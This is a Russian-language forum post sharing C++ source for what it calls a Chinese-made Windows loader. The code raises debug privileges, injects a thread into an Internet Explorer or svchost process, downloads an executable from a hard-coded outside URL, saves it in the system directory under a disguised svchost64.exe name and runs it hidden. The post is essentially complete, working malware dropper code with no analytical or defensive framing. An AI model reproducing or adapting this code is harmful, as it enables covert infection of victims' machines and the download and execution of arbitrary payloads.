- Статус
- Оффлайн
- Регистрация
- 19 Авг 2017
- Сообщения
- 355
- Реакции
- 118
загрузчик made in China
Код:
#include "stdafx.h”
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)
/***********************************************/
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //?? ShellExecute
LPCTSTR lpOperation,
LPCTSTR lpFile,
LPCTSTR lpParameters,
LPCTSTR lpDiretory,
INT nShowCmd);
typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //??MessageBoxA??
LPCTSTR lpszCaption, UINT nType);
// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //??CreateFileA
LPSECURITY_ATTRIBUTES,
DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //??WriteFile
LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //??CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //??GetModuleHandle
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //??GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //??LoadLibraryA
// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //??InternetOpen
IN DWORD dwAccessType,
IN LPCTSTR lpszProxyByName,
IN LPCTSTR lpszProxyByPass,
IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//??InternetOpenUrl
IN LPCTSTR lpszUrl,
IN LPCTSTR lpszHeaders OPTIONAL,
IN DWORD dwHeadersLength,
IN DWORD dwFlags,
IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //??InternetReadFile
IN LPVOID lpBuffer,
IN DWORD dwNumberOfBytesToRead,
OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //??InternetCloseHandle
typedef struct tag_Inject // define a structure to copy to distance process
{
fun_GetModuleHandle GetModuleHandle;
fun_GetProcAddress GetProcAddress;
fun_LoadLibrary LoadLibrary;
char szKernel[32];
char szUser[32];
char szNet[32];
char szShell[32];
char szMessageBox[32];
char szInternetOpen[32];
char szInternetOpenUrl[MAX_PATH];
char szInternetReadFile[128];
char szInternetCloseHandle[32];
char szCreateFile[32];
char szWriteFile[32];
char szCloseHandle[32];
char szShellExecute[32];
char szHeader[16];
char szInterFlag[32];
char szOpenFlag[10];
char szUrlAddr[MAX_PATH];
char szUrlAddr1[MAX_PATH];
char szFilePath[MAX_PATH];
char szFilePath1[MAX_PATH];
}Inject;
/***************************************/
/************************************************/
static BOOL ThreadProc(Inject* Inject_info)
{
HMODULE hKernel32, hUser32, hWininet, hShell32; //????
fun_InternetOpen j_InternetOpen; //??????
fun_InternetOpenUrl j_InternetOpenUrl;
fun_InternetReadFile j_InternetReadFile;
fun_InternetCloseHandle j_InternetCloseHandle;
fun_CreateFile j_CreateFile;
fun_WriteFile j_WriteFile;
fun_CloseHandle j_CloseHandle;
fun_MessageBox j_MessageBox;
fun_ShellExecute j_ShellExecute;
hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //????DLL
if (NULL == hKernel32) //????
{
hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //????
if (NULL == hKernel32) //??????
{
return FALSE;
}
}
hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
if (NULL == hUser32)
{
hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
if (NULL == hUser32)
{
return FALSE;
}
}
hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
if (NULL == hWininet)
{
hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
if (NULL == hWininet)
{
return FALSE;
}
}
hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
if (NULL == hShell32)
{
hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
if (NULL == hShell32)
{
return FALSE;
}
}
j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //?? InternetOpen
Inject_info->szInternetOpen);
j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //?? InternetOpenUrl
Inject_info->szInternetOpenUrl);
j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //?? InternetReadFile
Inject_info->szInternetReadFile);
j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //?? InternetCloseHandle
Inject_info->szInternetCloseHandle);
j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //?? CreateFile
Inject_info->szCreateFile);
j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //?? WriteFile
Inject_info->szWriteFile);
j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //?? CloseHandle
Inject_info->szCloseHandle);
j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //?? MessageBox
Inject_info->szMessageBox);
j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //?? ShellExecute
Inject_info->szShellExecute);
HINTERNET hNet, hFile; //???????????
hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
NULL, NULL, 0); //???????????
if (NULL == hNet) //??????
{
return FALSE;
}
hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
strlen(Inject_info->szHeader),
INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //?????URL??????URL?????
if (NULL == hFile) //????????
{
return FALSE;
}
char buff[1024]; //??????
DWORD dwRead, //???
dwWritten = NULL; //????????
HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //??????
0, NULL, CREATE_ALWAYS, 0 ,NULL);
if (NULL == hCreateFile) //???????
{
return FALSE;
}
while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
{
if (0 == dwRead) //?????????
break;
j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //?????????????
}
j_InternetCloseHandle(hNet); //??????
j_InternetCloseHandle(hFile); //????????
j_CloseHandle(hCreateFile); //????????
j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //????
return TRUE;
}
static void AddressFlag(void)
{
}
/******************************************************************************** ********************************/
/******************************************************************************** *******/
/* ?????????? DEBUG */
/******************************************************************************** *******/
/******************************************************************************** ********************************/
BOOL ImprovePrivilege() //?????
{
HANDLE hToken = NULL ; //????
BOOL bRet = FALSE; //??????
TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; //????????
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); //??????????
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //????????
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); //????? DEBUG ??
bRet = (GetLastError() == ERROR_SUCCESS); //????????
return bRet;
}
/******************************************************************************** ********************************/
/******************************************************************************** *******/
/* ??IExplore.exe???ID */
/******************************************************************************** *******/
/******************************************************************************** ********************************/
DWORD Get_ProcID()
{
char* strProc = new char[256];
HANDLE hSnap; //????
PROCESSENTRY32 ppe; //??????
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //????????
if (!ImprovePrivilege()) //???????
{
return FALSE;
}
ppe.dwSize = sizeof( PROCESSENTRY32 ); //??????
Process32First( hSnap, &ppe ); //???????
while ( 1 ) //???????????IE???
{
strcpy(strProc, ppe.szExeFile); //??
strProc = strlwr(strProc); //?????
if (0 == strcmp(strProc, “iexplore.exe“))//????? IE
{
return ppe.th32ProcessID;
}
else if (0 == strcmp(strProc, “svchost.exe“))//????? svchost
{
return ppe.th32ProcessID;
}
if ( !Process32Next( hSnap, &ppe ))
{
break;
}
}
CloseHandle( hSnap );
return 0;
}
/*************************************/
/******************************************************************************** *****/
/* ? ThreadProc ??????????????????? */
/*************************************/
/*************************************/
BOOL InsertThread()
{
char szSystemRoot[MAX_PATH];
PDWORD pdwRemote = NULL; //????????
const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//??????
Inject *InjectRemote = NULL; //?Inject???????????
DWORD dwThread = NULL,
dwOut = NULL,
dwProc = Get_ProcID();
HANDLE hProc = NULL;
const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //????????
Inject Inject_stru = {NULL, NULL, NULL,
“kernel32.dll“,
“user32.dll“,
“wininet.dll“,
“shell32.dll“,
“MessageBoxA“,
“InternetOpenA“,
“InternetOpenUrlA“,
“InternetReadFile“,
“InternetCloseHandle“,
“CreateFileA“,
“WriteFile“,
“CloseHandle“,
“ShellExecuteA“,
“Accept: */*\r\n\r\n“,
“RookIE/1.0“,
“wba“,
“[url]http://www.hf-hx.com/music/x.exe“[/url],
“”}; //?????
GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //??????
strcat(szSystemRoot, “\\svchost64.exe“); //?????(???)
strcpy(Inject_stru.szFilePath, szSystemRoot); //???Inject ????szFilePaht
HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);//??GetModuleHandle
Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“); //??GetProcAddress
Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);//??LoadLibrary
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); //????????????
if (NULL == hProc)
{
return FALSE;
}
pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //???????????
if (NULL == pdwRemote)
{
return FALSE;
}
if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //???????????
{
return FALSE;
}
InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) //???????????
{
return FALSE;
}
if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //??????
{
return FALSE;
}
return TRUE;
}
/******************************************/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InsertThread();
return 0;
}
